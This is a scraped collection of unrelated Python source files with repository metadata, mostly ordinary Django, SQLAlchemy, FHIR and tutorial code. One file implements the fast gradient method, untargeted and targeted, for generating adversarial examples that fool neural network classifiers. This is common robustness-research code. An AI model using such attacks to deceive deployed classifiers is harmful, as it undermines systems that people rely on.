2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.urls import path, include
from django.contrib import admin
urlpatterns = [
# url(r'^admin/', admin.site.urls),
path('', include('web.index.urls')),
]
| [
"lorexxar@gmail.com"
] | lorexxar@gmail.com |
26b88be88e55b48918a20c0c1005f2cb756ce5e6 | b23a50e14a7b13b58a04c34f54e9438fa1d0a877 | /code/JobAdmin/Job/migrations/0009_auto_20210415_1010.py | 59e1fd3fb500bd28a10cbcf8ff7146eeb6de6eda | [] | no_license | IamZY/StudentJobAdmin | 648bf3e9160b888b0b2349c8724ea43d1b69c53c | 60fc509a48d0fd49afb44ba3fbb796a33ed4aa5b | refs/heads/master | 2023-05-02T13:07:18.879989 | 2021-05-24T00:33:09 | 2021-05-24T00:33:09 | 367,892,392 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | # Generated by Django 3.1.7 on 2021-04-15 02:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Job', '0008_resume'),
]
operations = [
migrations.AddField(
model_name='resume',
name='name',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='resume',
name='time',
field=models.CharField(max_length=255, null=True),
),
]
| [
"562018301@qq.com"
] | 562018301@qq.com |
0d0979c507b6b380600c8f95dd37891c078b1b19 | 228604664db2a8c12ed08c7aee68e1e957d9ebaa | /Pętle.py | ad2e74c91d93ccd4ed5832cd86534b1407e0803b | [] | no_license | Dqvvidq/Nauka | 83767b08481f8e765a8d2a2bb46f30a7a903739e | a65da42b9ec422c30ebc6d1a422559d8de360fe3 | refs/heads/main | 2023-01-20T05:42:33.936406 | 2020-11-29T22:10:10 | 2020-11-29T22:10:10 | 310,408,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,329 | py | #petle for
name = "Ted"
for litera in name:
print(litera)
#pętla for w liscie
list = ["banan", "chleb", "Vuda", "mleko"]
for lista in list:
print(lista)
#petla for w krotce
kroteczka = ("Masło", True, False, 101)
for krotka in kroteczka:
print(krotka)
#petla for w slowniku (wyswietla tylko klucze)
słownik = {"Audi": "A6",
"Bmw": "e46",
"Alfa Romeo": "156"}
for klucze in słownik:
print(klucze)
#zwiększanie liter w liście
tv = ["Spadkobiercy", "Jaka to melodia", "Familiada"]
i = 0
for show in tv:
new = tv[i]
new = new.upper()
tv[i] = new
i += 1
print (tv)
# inna składnia pętli for
for i, show in enumerate(tv):
new = tv[i]
new = new.upper()
tv[i] = new
print(tv)
# przenoszenie elementów dzięki pętli for
coms = ["programowanie", "znajomi", "hillout"]
all_shows = []
for show in tv:
show = show.upper()
all_shows.append(show)
for show in coms:
show = show.upper()
all_shows.append(show)
print(all_shows)
# funkcja range
for i in range (1, 11):
print(i)
#petla while
x = 10
while x > 0:
print('{}'.format(x))
x -= 1
print("Szczęśliwego nowego roku!")
# instrukcja break
for i in range (0, 100):
print(i)
if i == 55:
break
#program który będzie prosić użytkownika o wpisanie danych dopoki nacisnie q
qs = ["Jak masz na imie?: ", "Jaki jest twój ulubiony kolor?: ", "Jakie masz zadanie?: "]
n = 0
while True:
print("Wpisz q aby zakończyć")
a = input(qs[n])
if a == "q":
print("Zakończono program")
break
n = (n + 1) % 3
#instrukcja continue
for i in range (2, 6):
if i == 3:
continue
print(i)
# instrukcja continue w petli while
i = 1
while i <= 5:
if i == 3:
i += 1
continue
print(i)
i += 1
# pętle zagnieżdżona
for i in range (1, 3):
print(i)
for letter in ["a", "b", "c"]:
print(letter)
list1 = [1, 2, 3, 4]
list2 = [5, 6, 7, 8]
added = []
for i in list1:
for j in list2:
added.append(i + j)
print(added)
# pętla for wewnatrz petli while
while input('t czy n?') !='n':
for i in range (1, 6):
print(i) | [
"noreply@github.com"
] | noreply@github.com |
3f9f273e1fb3fa3b5e303f9f4d2789e44b45ead3 | 307da11c0b04aca15815e204be43355bf598b8b1 | /FileHandlingAssig/assig3.py | e594a99e1ad2eba132dd7aab9980dc2103f7eba6 | [] | no_license | asatiratnesh/Python_Assignment | a573e47ce6ebca8e48a5b5efc80c9fdd17eb10bf | ece2930d0f23383b9227a2d7110101fec35036e9 | refs/heads/master | 2020-04-19T10:32:41.592101 | 2019-02-01T12:40:25 | 2019-02-01T12:40:25 | 168,143,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | # convert the content of files in reverse order.
fileHandle = open("abc.txt", "r")
fileHandle.seek(0)
revString = fileHandle.read()[::-1]
fileHandleWrite = open("abc.txt", "w")
fileHandleWrite.write(revString)
fileHandleWrite.close()
| [
"ratnesh.asati@harbingergroup.com"
] | ratnesh.asati@harbingergroup.com |
28e9be7467b749a9f75b1304978786d2c3f3c9d7 | 756f1c2c014b928c57fc2001347abbb1f104b696 | /python/marvin/core/caching_query.py | 6c09ef2b321a6d4aef280f971b2724df5f7a9921 | [
"BSD-3-Clause"
] | permissive | sdss/marvin | ebe1e5325ed20fb46324ae6529bcc9acc220bd10 | db4c536a65fb2f16fee05a4f34996a7fd35f0527 | refs/heads/main | 2022-11-08T23:16:00.622114 | 2022-11-02T15:25:53 | 2022-11-02T15:25:53 | 71,501,855 | 56 | 40 | BSD-3-Clause | 2022-08-11T13:16:21 | 2016-10-20T20:30:15 | Python | UTF-8 | Python | false | false | 9,153 | py | #!/usr/bin/env python
# encoding: utf-8
"""caching_query.py
Represent functions and classes
which allow the usage of Dogpile caching with SQLAlchemy.
Introduces a query option called FromCache.
The three new concepts introduced here are:
* CachingQuery - a Query subclass that caches and
retrieves results in/from dogpile.cache.
* FromCache - a query option that establishes caching
parameters on a Query
* RelationshipCache - a variant of FromCache which is specific
to a query invoked during a lazy load.
* _params_from_query - extracts value parameters from
a Query.
The rest of what's here are standard SQLAlchemy and
dogpile.cache constructs.
"""
from sqlalchemy.orm.interfaces import MapperOption
from sqlalchemy.orm.query import Query
from dogpile.cache.api import NO_VALUE
class CachingQuery(Query):
"""A Query subclass which optionally loads full results from a dogpile
cache region.
The CachingQuery optionally stores additional state that allows it to
consult a dogpile.cache cache before accessing the database, in the form
of a FromCache or RelationshipCache object. Each of these objects
refer to the name of a :class:`dogpile.cache.Region` that's been configured
and stored in a lookup dictionary. When such an object has associated
itself with the CachingQuery, the corresponding :class:`dogpile.cache.Region`
is used to locate a cached result. If none is present, then the
Query is invoked normally, the results being cached.
The FromCache and RelationshipCache mapper options below represent
the "public" method of configuring this state upon the CachingQuery.
"""
def __init__(self, regions, *args, **kw):
self.cache_regions = regions
Query.__init__(self, *args, **kw)
def __iter__(self):
"""override __iter__ to pull results from dogpile
if particular attributes have been configured.
Note that this approach does *not* detach the loaded objects from
the current session. If the cache backend is an in-process cache
(like "memory") and lives beyond the scope of the current session's
transaction, those objects may be expired. The method here can be
modified to first expunge() each loaded item from the current
session before returning the list of items, so that the items
in the cache are not the same ones in the current Session.
"""
if hasattr(self, '_cache_region'):
return self.get_value(createfunc=lambda: list(Query.__iter__(self)))
else:
return Query.__iter__(self)
def _get_cache_plus_key(self):
"""Return a cache region plus key."""
dogpile_region = self.cache_regions[self._cache_region.region]
if self._cache_region.cache_key:
key = self._cache_region.cache_key
else:
key = _key_from_query(self)
return dogpile_region, key
def invalidate(self):
"""Invalidate the cache value represented by this Query."""
dogpile_region, cache_key = self._get_cache_plus_key()
dogpile_region.delete(cache_key)
def get_value(self, merge=True, createfunc=None,
expiration_time=None, ignore_expiration=False):
"""Return the value from the cache for this query.
Raise KeyError if no value present and no
createfunc specified.
"""
dogpile_region, cache_key = self._get_cache_plus_key()
# ignore_expiration means, if the value is in the cache
# but is expired, return it anyway. This doesn't make sense
# with createfunc, which says, if the value is expired, generate
# a new value.
assert not ignore_expiration or not createfunc, \
"Can't ignore expiration and also provide createfunc"
if ignore_expiration or not createfunc:
cached_value = dogpile_region.get(cache_key,
expiration_time=expiration_time,
ignore_expiration=ignore_expiration)
else:
cached_value = dogpile_region.get_or_create(
cache_key,
createfunc,
expiration_time=expiration_time
)
if cached_value is NO_VALUE:
raise KeyError(cache_key)
if merge:
cached_value = self.merge_result(cached_value, load=False)
return cached_value
def set_value(self, value):
"""Set the value in the cache for this query."""
dogpile_region, cache_key = self._get_cache_plus_key()
dogpile_region.set(cache_key, value)
def use_cache(self, backend='default'):
''' Adds the cache onto a Query instance
Parameters:
backend (str):
Type of cache backend to use. Can be 'null', 'default', or 'maps'.
Returns:
returns a SQLA query instance with caching turned on
'''
from marvin import marvindb
from marvin.db.caching import regions
assert backend in list(regions.keys()), 'backend must be a proper cache backend'
return self.options(FromCache(backend)).options(*marvindb.cache_bits)
def query_callable(regions, query_cls=CachingQuery):
def query(*arg, **kw):
return query_cls(regions, *arg, **kw)
return query
def _key_from_query(query, qualifier=None):
"""Given a Query, create a cache key.
There are many approaches to this; here we use the simplest,
which is to create an md5 hash of the text of the SQL statement,
combined with stringified versions of all the bound parameters
within it. There's a bit of a performance hit with
compiling out "query.statement" here; other approaches include
setting up an explicit cache key with a particular Query,
then combining that with the bound parameter values.
"""
stmt = query.with_labels().statement
compiled = stmt.compile()
params = compiled.params
# here we return the key as a long string. our "key mangler"
# set up with the region will boil it down to an md5.
return " ".join(
[str(compiled)] +
[str(params[k]) for k in sorted(params)])
class FromCache(MapperOption):
"""Specifies that a Query should load results from a cache."""
propagate_to_loaders = False
def __init__(self, region="default", cache_key=None):
"""Construct a new FromCache.
:param region: the cache region. Should be a
region configured in the dictionary of dogpile
regions.
:param cache_key: optional. A string cache key
that will serve as the key to the query. Use this
if your query has a huge amount of parameters (such
as when using in_()) which correspond more simply to
some other identifier.
"""
self.region = region
self.cache_key = cache_key
def process_query(self, query):
"""Process a Query during normal loading operation."""
query._cache_region = self
class RelationshipCache(MapperOption):
"""Specifies that a Query as called within a "lazy load"
should load results from a cache."""
propagate_to_loaders = True
def __init__(self, attribute, region="default", cache_key=None):
"""Construct a new RelationshipCache.
:param attribute: A Class.attribute which
indicates a particular class relationship() whose
lazy loader should be pulled from the cache.
:param region: name of the cache region.
:param cache_key: optional. A string cache key
that will serve as the key to the query, bypassing
the usual means of forming a key from the Query itself.
"""
self.region = region
self.cache_key = cache_key
self._relationship_options = {
(attribute.property.parent.class_, attribute.property.key): self
}
def process_query_conditionally(self, query):
"""Process a Query that is used within a lazy loader.
(the process_query_conditionally() method is a SQLAlchemy
hook invoked only within lazyload.)
"""
if query._current_path:
mapper, prop = query._current_path[-2:]
key = prop.key
for cls in mapper.class_.__mro__:
if (cls, key) in self._relationship_options:
relationship_option = self._relationship_options[(cls, key)]
query._cache_region = relationship_option
break
def and_(self, option):
"""Chain another RelationshipCache option to this one.
While many RelationshipCache objects can be specified on a single
Query separately, chaining them together allows for a more efficient
lookup during load.
"""
self._relationship_options.update(option._relationship_options)
return self
| [
"havok2063@hotmail.com"
] | havok2063@hotmail.com |
b216a687cf570621fe06b237e2f4af8888a5bd8f | 4acd0d1561e057ac312b6f62a5504fef8a9b8d1a | /attacks/fast_gradient.py | 334df07c4deb1a8f30dfa25f6ed35066dd55c5d3 | [] | no_license | ValamogulisZ/DS_FoolingCNN | 810bd8435752dbba2060901097aaf50d48e4eb08 | b576f3efeea7bc0a841d833472a81e009fac84dd | refs/heads/master | 2022-12-03T03:44:17.889915 | 2020-08-25T01:39:35 | 2020-08-25T01:39:35 | 290,056,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,115 | py | import tensorflow as tf
__all__ = [
'fgm', # fast gradient method
'fgmt' # fast gradient method with target
]
def fgm(model, x, eps=0.01, epochs=1, sign=True, clip_min=0., clip_max=1.):
"""
Fast gradient method.
See https://arxiv.org/abs/1412.6572 and https://arxiv.org/abs/1607.02533
for details. This implements the revised version since the original FGM
has label leaking problem (https://arxiv.org/abs/1611.01236).
:param model: A wrapper that returns the output as well as logits.
:param x: The input placeholder.
:param eps: The scale factor for noise.
:param epochs: The maximum epoch to run.
:param sign: Use gradient sign if True, otherwise use gradient value.
:param clip_min: The minimum value in output.
:param clip_max: The maximum value in output.
:return: A tensor, contains adversarial samples for each input.
"""
xadv = tf.identity(x)
ybar = model(xadv)
yshape = ybar.get_shape().as_list()
ydim = yshape[1]
indices = tf.argmax(ybar, axis=1)
target = tf.cond(
tf.equal(ydim, 1),
lambda: tf.nn.relu(tf.sign(ybar - 0.5)),
lambda: tf.one_hot(indices, ydim, on_value=1.0, off_value=0.0))
if 1 == ydim:
loss_fn = tf.nn.sigmoid_cross_entropy_with_logits
else:
loss_fn = tf.nn.softmax_cross_entropy_with_logits
if sign:
noise_fn = tf.sign
else:
noise_fn = tf.identity
eps = tf.abs(eps)
def _cond(xadv, i):
return tf.less(i, epochs)
def _body(xadv, i):
ybar, logits = model(xadv, logits=True)
loss = loss_fn(labels=target, logits=logits)
dy_dx, = tf.gradients(loss, xadv)
xadv = tf.stop_gradient(xadv + eps*noise_fn(dy_dx))
xadv = tf.clip_by_value(xadv, clip_min, clip_max)
return xadv, i+1
xadv, _ = tf.while_loop(_cond, _body, (xadv, 0), back_prop=False,
name='fast_gradient')
return xadv
def fgmt(model, x, y=None, eps=0.01, epochs=1, sign=True, clip_min=0.,
clip_max=1.):
"""
Fast gradient method with target
See https://arxiv.org/pdf/1607.02533.pdf. This method is different from
FGM that instead of decreasing the probability for the correct label, it
increases the probability for the desired label.
:param model: A model that returns the output as well as logits.
:param x: The input placeholder.
:param y: The desired target label, set to the least-likely class if None.
:param eps: The noise scale factor.
:param epochs: Maximum epoch to run.
:param sign: Use gradient sign if True, otherwise gradient values.
:param clip_min: Minimum value in output.
:param clip_max: Maximum value in output.
"""
xadv = tf.identity(x) # create a copy of x
ybar = model(xadv)
ydim = ybar.get_shape().as_list()[1]
n = tf.shape(ybar)[0]
if y is None:
indices = tf.argmin(ybar, axis=1)
else:
indices = tf.cond(tf.equal(0, tf.rank(y)),
lambda: tf.zeros([n], dtype=tf.int32) + y,
lambda: tf.zeros([n], dtype=tf.int32))
target = tf.cond(
tf.equal(ydim, 1),
lambda: 1 - ybar,
lambda: tf.one_hot(indices, ydim, on_value=1.0, off_value=0.0))
if 1 == ydim:
loss_fn = tf.nn.sigmoid_cross_entropy_with_logits
else:
loss_fn = tf.nn.softmax_cross_entropy_with_logits
if sign:
noise_fn = tf.sign
else:
noise_fn = tf.identity
eps = -tf.abs(eps)
def _cond(xadv, i):
return tf.less(i, epochs)
def _body(xadv, i):
ybar, logits = model(xadv, logits=True)
loss = loss_fn(labels=target, logits=logits)
dy_dx, = tf.gradients(loss, xadv)
xadv = tf.stop_gradient(xadv + eps*noise_fn(dy_dx))
xadv = tf.clip_by_value(xadv, clip_min, clip_max)
return xadv, i+1
xadv, _ = tf.while_loop(_cond, _body, (xadv, 0), back_prop=False,
name='fast_gradient_target')
return xadv
| [
"wenda@uab.edu"
] | wenda@uab.edu |
33ada4e6e7d04902f90c47195ed200e4fd0537b1 | 7700871499bc3796f188a16948481b7d467094d0 | /src/wsgi.py | 4d1f6be01fca31755c2436d8ac9681d109f7581e | [] | no_license | jasonjets/mpulse | 68995dbcb52984675d31a117b2b6726475b40457 | 1eba3a83ee073da8b3d4a2df61402fc591c73975 | refs/heads/main | 2023-02-16T04:47:48.340054 | 2021-01-03T19:31:39 | 2021-01-03T19:31:39 | 307,150,250 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "src.settings")
application = get_wsgi_application()
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'src.settings')
application = get_wsgi_application() | [
"bettsjason@outlook.com"
] | bettsjason@outlook.com |
2de2010bec76a55f68fd7df8729f7d83ce87a3ea | fe8360d9284d8156cd557d3a757645c11849cdd9 | /models/address.py | 3c11b1443ea2136894676b06698d4e57f8b4cd02 | [] | no_license | hvanreenen/fhir-rest-server | 5a1a5bcb9a3477d9f9d133c263f61ba202db5741 | 36ae55706aba0fdfcf084dbb24bd8c73929b3e0f | refs/heads/master | 2021-01-10T23:45:06.793874 | 2016-10-20T09:57:04 | 2016-10-20T09:57:04 | 70,390,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,973 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 (http://hl7.org/fhir/StructureDefinition/Address) on 2016-10-07.
# 2016, SMART Health IT.
from . import element
class Address(element.Element):
""" A postal address.
There is a variety of postal address formats defined around the world. This
format defines a superset that is the basis for all addresses around the
world.
"""
resource_name = "Address"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.city = None #type: str
""" Name of city, town etc..
Type `str`. """
self.country = None #type: str
""" Country (can be ISO 3166 3 letter code).
Type `str`. """
self.district = None #type: str
""" District name (aka county).
Type `str`. """
self.line = None #type: List[str]
""" Street name, number, direction & P.O. Box etc..
List of `str` items. """
self.period = None #type: period.Period
""" Time period when address was/is in use.
Type `Period` (represented as `dict` in JSON). """
self.postalCode = None #type: str
""" Postal code for area.
Type `str`. """
self.state = None #type: str
""" Sub-unit of country (abbreviations ok).
Type `str`. """
self.text = None #type: str
""" Text representation of the address.
Type `str`. """
self.type = None #type: str
""" postal | physical | both.
Type `str`. """
self.use = None #type: str
""" home | work | temp | old - purpose of this address.
Type `str`. """
super(Address, self).__init__(jsondict=jsondict, strict=strict)
def __str__(self):
return ''
def elementProperties(self):
js = super(Address, self).elementProperties()
js.extend([
("city", "city", str, False, None, False),
("country", "country", str, False, None, False),
("district", "district", str, False, None, False),
("line", "line", str, True, None, False),
("period", "period", period.Period, False, None, False),
("postalCode", "postalCode", str, False, None, False),
("state", "state", str, False, None, False),
("text", "text", str, False, None, False),
("type", "type", str, False, None, False),
("use", "use", str, False, None, False),
])
return js
from . import period
| [
"henk-jan.van.reenen@nlhealthcareclinics.com"
] | henk-jan.van.reenen@nlhealthcareclinics.com |
30778759c840d8ed1e486027a1193056053b1267 | 8c3af416370dca5d7b464b486b535e4fdd205ff2 | /pygraphviz/__init__.py | a807801fc9916b7f2f1c649a0d66c69b237194f2 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | arruda/pygraphviz | 7518823737fc532d898d43bf71c26a7a5cb8c4bf | 8e448527ff9b1df79c5c42e353f19d056797d9bc | refs/heads/master | 2016-08-03T12:19:48.122491 | 2011-07-31T22:03:57 | 2011-07-31T22:03:57 | 2,175,550 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | """
A Python wrapper for the graphviz Agraph data structure.
Quick example::
>>> from pygraphviz import *
>>> G=AGraph()
>>> G.add_node('a')
>>> G.add_edge('b','c')
>>> print G # doctest: +SKIP
strict graph {
a;
b -- c;
}
<BLANKLINE>
See pygraphviz.AGraph for detailed documentation.
"""
# Copyright (C) 2004-2010 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Manos Renieris, http://www.cs.brown.edu/~er/
# Distributed with BSD license.
# All rights reserved, see LICENSE for details.
# Release data
import release
if release.revision is None:
# we probably not running in an svn directory
try:
# use release data stored at installatation time.
import version
__version__ = version.__version__
__revision__ = version.__revision__
__date__ = version.__date__
except ImportError:
# version.py was not created or no longer exists
__version__ = release.version
__revision__ = release.revision
__date__ = release.date
else:
# use dynamic values, even if version.py exists
__version__ = release.version
__revision__ = release.revision
__date__ = release.date
__author__ = '%s <%s>\n%s <%s>\n%s <%s>' % \
( release.authors['Hagberg'] + release.authors['Schult'] + \
release.authors['Renieris'] )
__license__ = release.license
from agraph import AGraph, Node, Edge, Attribute, ItemAttribute
__all__=[
'AGraph',
'Node',
'Edge',
'Attribute',
'ItemAttribute'
]
def version():
from agraph import _get_prog
import os
print "pygraphviz-"+__version__
neato=_get_prog('neato')
os.system(neato+' -V')
# import tests: run as pygraphviz.test()
from tests import run as test
| [
"aric@3ed01bd8-26fb-0310-9e4c-ca1a4053419f"
] | aric@3ed01bd8-26fb-0310-9e4c-ca1a4053419f |
d5e93ff63e27e52cc36be5db20e4b14098d39c90 | 0be496ab33e732c8e25557a6fadba70b305d90b9 | /Task_Four/Ques6.py | aa2c48c3d16395664e1631cd0ce38df4fead0126 | [] | no_license | DharaTandel/Python | a7bbd7a4794b2c7e844de3127fa2ea5e9321e99c | a33d8237817e63ad1fe4f1f9579de16f0a8c984e | refs/heads/main | 2023-03-30T00:40:41.921856 | 2021-03-29T00:15:19 | 2021-03-29T00:15:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | def Sum(a,b):
S= int(a)+int(b)
return S
x="10"
y="20"
print(Sum(x,y)) | [
"noreply@github.com"
] | noreply@github.com |
7b480b508fc082bd44699b3765985666f6a32593 | 0db91f8a6b295ff72b0cb3e7e6b1ddf2a39f7c1e | /moorse_code1.py | f433dfc4a9f97cbca0af9d7b52f7771d0375f5d9 | [] | no_license | alphabetz/dailyprogrammer | 3fb239a3ae8bfb1ce7886584b479e8d5075f671a | ce78ef4f18b409cf8659f9ebe21fb672abe920b4 | refs/heads/master | 2020-07-11T22:56:47.111546 | 2019-09-05T08:18:34 | 2019-09-05T08:18:34 | 204,661,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 877 | py | # r/dailyprogrammer
# easy #380
# Smooshed Morse Code 1
# write Moorse code generator
def smorse(text):
code = {
'a' : '.-',
'b' : '-...',
'c' : '-.-.',
'd' : '-..',
'e' : '.',
'f' : '..-.',
'g' : '--.',
'h' : '....',
'i' : '..',
'j' : '.---',
'k' : '-.-',
'l' : '.-..',
'm' : '--',
'n' : '-.',
'o' : '---',
'p' : '.--.',
'q' : '--.-',
'r' : '.-.',
's' : '...',
't' : '-',
'u' : '..-',
'v' : '...-',
'w' : '.--',
'x' : '-..-',
'y' : '-.--',
'z' : '--..'
}
text = text.lower()
print(text, "==> ", end='')
'''
#first version
for t in text:
for key, value in code.items():
if t in key:
print(value, end = '')
print('')
'''
for t in range(len(text)):
print(code[text[t]], end = '')
print('')
smorse("sos")
smorse("daily")
smorse("programmer")
smorse("bits")
smorse("three")
| [
"rm.ratthapong@gmail.com"
] | rm.ratthapong@gmail.com |
6b8edfa952b17f7a238eef9bfbc6a14d6c47eec1 | 1a19dac76dc82d4de3e6fb95b7cf84478dd41ad9 | /accounts/migrations/0004_remove_profile_status.py | 224a1ad816d867c6058e184b0d339655d6828888 | [] | no_license | Kambaulaya1234/inventory | c5715dcc1af1820797b67ecb0d7c167b491bd87a | 8c244be36a49433fd9cecae5eb36682881d33978 | refs/heads/main | 2023-04-19T21:43:33.609816 | 2021-05-06T05:43:21 | 2021-05-06T05:43:21 | 364,646,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | # Generated by Django 3.0.5 on 2020-04-24 12:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_auto_20200424_0930'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='status',
),
]
| [
"mwaluandagaspa@gmail.com"
] | mwaluandagaspa@gmail.com |
aff99ca9c0437f8148335598643af70076e96820 | aeb215ecd792ab99c722e864728d388fe69c545f | /templeB.py | a49bf3a6e3c1b0169646c01890bc40f785317d31 | [] | no_license | kcho/templeBehavioural | d07e9b4aaf0123de5c3504d78e3f3b45fbfb7c9c | b8b9d386671b31be1d2f138c547d264434c28d30 | refs/heads/master | 2020-05-19T10:04:53.869137 | 2014-07-24T13:25:42 | 2014-07-24T13:25:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,276 | py | #!/Users/admin/anaconda/bin/python
import unicodedata
import re
import codecs
import os
import csv
import argparse
import textwrap
import pandas as pd
import numpy as np
def findBehaviourDir(directory):
# find 'Behavior_Data'
behaviourDir=[]
for root,dirs,files in os.walk(directory):
if re.search('Behavior_Data',root):
print root
behaviourDir.append(root)
return behaviourDir
def main(args):
behaviourDirs = findBehaviourDir(os.path.abspath(args.directory))
tables = readTables(behaviourDirs)
mergedDf = tables2Df(tables)
toExcel(mergedDf)
def tables2Df(tables):
init=pd.DataFrame()
for dictWithMean in tables:
# dictionary into dataframe
df=pd.DataFrame.from_dict(dictWithMean)
# set index names
df.index=['ACC','RT','subjectName','timeline']
# transpose the table
df = df.T
# name them
df.index = pd.MultiIndex.from_arrays([[x[0] for x in df.index],
[x[1] for x in df.index]],names=['Run','Detail'])
# initialise the index
dfIndexReset = df.reset_index()
# pivot table
pivotTable = pd.pivot_table(dfIndexReset,
values=['ACC','RT'],
columns=['Run'],
index=['subjectName','timeline','Detail'],
aggfunc=np.sum)
# column name set
pivotTable.columns.names=['value','Run']
# value column to index
table = pivotTable.stack('value')
# swaplevels of the index
table.index = table.index.swaplevel(2,3)
# order index
table = table.sortlevel()
# adding average
table['average'] = table.T.mean()
# merging
init = pd.concat([init,table])
return init
def readTables(behaviourDirs):
tables = []
# for each behaviourDirs
for behaviourDir in behaviourDirs:
# get subject name
subjectName = re.search('((MED|CON)\d{2})',behaviourDir).group(1)
# get timeline
timeline = re.search('(pre|post)',behaviourDir).group(1)
# find log texts
textList = [os.path.join(behaviourDir,x) for x in os.listdir(behaviourDir) if re.search('Temple.*txt$',x)]
# for each log text
# make a directory
dictWithMean = {}
for text in textList:
# get information such as ...
# dictionary = {'correct':correctTrials,
#'wrong':wrongTrials,
#'cong':congruent,
#'incong':incongruent,
#'spatial':spatial,
#'alert':alert,
#'noQue':noQue}
dictionary = getInfo(text)
for name,trialTexts in dictionary.iteritems():
mean = getMean(trialTexts)
dictWithMean[(os.path.basename(text)[-5],name)]=(
len(trialTexts),mean,subjectName,timeline,)
tables.append(dictWithMean)
return tables
def toExcel(mergedDf):
mergedDf.index = pd.MultiIndex.from_tuples(mergedDf.index)
#print mergedDf.head()
mergedDf.index.names=['subject','timeline','variable','condition']
mergedDf = mergedDf.sortlevel(level=1,ascending=False,sort_remaining=False).sortlevel(level=0,sort_remaining=False)
#print mergedDf.index.sortlevel(level=1)
writer = pd.ExcelWriter('/Volumes/promise/CCNC_SNU_temple_2014/3_dataSpreadSheet/behaviour.xlsx')
mergedDf.to_excel(writer,'Sheet1')
writer.save()
def getMean(trialTexts):
value = 0
#print len(trialTexts)
for trialText in trialTexts:
#print trialText
#print int(re.search('SlideTarget.RT: (\d+)',trialText).group(1))
value += float(re.search('SlideTarget.RT: (\d+)',trialText).group(1))
try:
value = value/len(trialTexts)
except:
value = 0
return value
def getInfo(textFile):
#print textFile
#print '='*25
#with codecs.open(textFile, encoding='utf-16') as f, open('output.csv', 'w') as fout:
#text = f.read()
with codecs.open(textFile, encoding='utf-16') as f:
text = f.read()
#total trials
textSplit = text.split('*** LogFrame Start ***')
#correct trials only
correctTrials = [x for x in textSplit if re.search('SlideTarget.ACC: 1',x)]
#print 'correct : {0}'.format(len(correctTrials))
wrongTrials = [x for x in textSplit if re.search('SlideTarget.ACC: 0',x)]
#for less than 2000
lessThan2000 = [x for x in correctTrials if int(re.search('SlideTarget.RT: (\d+)',x).group(1)) < 2000]
congruent = [x for x in lessThan2000 if 'FlankingType: congruent' in x]
incongruent = [x for x in lessThan2000 if 'FlankingType: incongruent' in x]
spatial = [x for x in lessThan2000 if 'CuePositionY: 270' in x or 'CuePositionY: 210' in x]
alert = [x for x in lessThan2000 if 'CuePositionY: 240' in x]
noQue = [x for x in lessThan2000 if 'CuePositionY: -100' in x]
#dictionary = {'correct':correctTrials,
#'wrong':wrongTrials,
#'cong':congruent,
#'incong':incongruent,
#'spatial':spatial,
#'alert':alert,
#'noQue':noQue}
#without correct / wrong list
dictionary = {'cong':congruent,
'incong':incongruent,
'spatial':spatial,
'alert':alert,
'noQue':noQue}
return dictionary
if __name__=='__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description = textwrap.dedent('''\
{codeName} : Pre-process the new diffusion tensor images
==========================================================
eg) {codeName}
eg) {codeName} --dir /Users/kevin/NOR04_CKI
eg) {codeName} --dir /Users/kevin/NOR04_CKI
'''.format(codeName=os.path.basename(__file__))))
parser.add_argument('-dir','--directory',help='Data directory location',
default='/Volumes/promise/CCNC_SNU_temple_2014/2_data')
args = parser.parse_args()
main(args)
| [
"cke8671@hotmail.com"
] | cke8671@hotmail.com |
e4ffd83343645d489fd7f0901317a07d4bdea4b1 | c0a25bd77d98e6087c745d5fa2862c4a715a8f59 | /standupmeeting/settings.py | 241a863296e0a608133996cb32846d82c37359a1 | [] | no_license | codyowl/standupmeeting | a84f356b611bd87956b9aa15c58a6ca63fbffebc | bd2a782406901f492f54c1780e1d85d07fe51c20 | refs/heads/master | 2021-01-21T15:18:49.137211 | 2017-06-17T17:47:40 | 2017-06-17T17:47:40 | 91,837,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,870 | py | """
Django settings for standupmeeting project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
